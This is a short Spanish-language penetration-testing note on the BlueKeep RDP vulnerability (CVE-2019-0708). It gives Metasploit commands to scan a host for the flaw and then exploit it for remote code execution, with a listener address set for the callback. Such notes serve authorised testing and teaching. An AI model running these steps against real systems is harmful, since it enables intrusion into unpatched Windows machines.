BlueKeep - Vulnerabilidad RDP
Vulnerabilidad BlueKeep en RDP
BlueKeep (identificada como CVE-2019-0708) es una vulnerabilidad crítica en el Protocolo de Escritorio Remoto (RDP) de Microsoft, permite la ejecución remota de código. Fue descubierta en mayo de 2019 y afecta a varias versiones del sistema operativo Windows, incluyendo Windows 7, Windows Server 2008 R2 y Windows Server 2008.
Comprobación Vulnerable (Metasploit)
Usamos el módulo : auxiliary/scanner/rdp/cve_2019_0708_bluekeep
use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
set RHOST <IP>
runExplotación con Metasploit
Usamos el módulo: exploit/windows/rdp/cve_2019_0708_bluekeep_rce
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
set RHOSTS <IP>
set LHOST <Local IP>
set LPORT <Local port>
show targets
set target <0-8>
exploitÚltima actualización